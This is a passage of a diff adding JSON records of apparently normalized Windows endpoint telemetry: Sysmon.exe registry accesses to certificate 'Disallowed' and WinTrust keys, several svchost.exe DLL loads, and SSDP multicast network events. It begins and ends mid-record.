"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881990000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "webio.dll", + "image_path": "C:\\Windows\\System32\\webio.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 
131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570882150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "destination_address": "239.255.255.250", + "destination_port": "1900", + "event_type": "network", + "pid": 1156, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "127.0.0.1", + "source_port": "56578", + "subtype": "outgoing", + "timestamp": 131883570878990000, + "unique_pid": "{42FC7E13-B2DB-5C05-0000-0010740A0500}", + "user": "NT AUTHORITY\\LOCAL SERVICE", + 
"user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "destination_address": "127.0.0.1", + "destination_port": "56578", + "event_type": "network", + "pid": 1156, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "239.255.255.250", + "source_port": "1900", + "subtype": "incoming", + "timestamp": 131883570879000000, + "unique_pid": "{42FC7E13-B2DB-5C05-0000-0010740A0500}", + "user": "NT AUTHORITY\\LOCAL SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "usermgrcli.dll", + "image_path": "C:\\Windows\\System32\\usermgrcli.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "ExecModelClient.dll", + "image_path": "C:\\Windows\\System32\\ExecModelClient.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
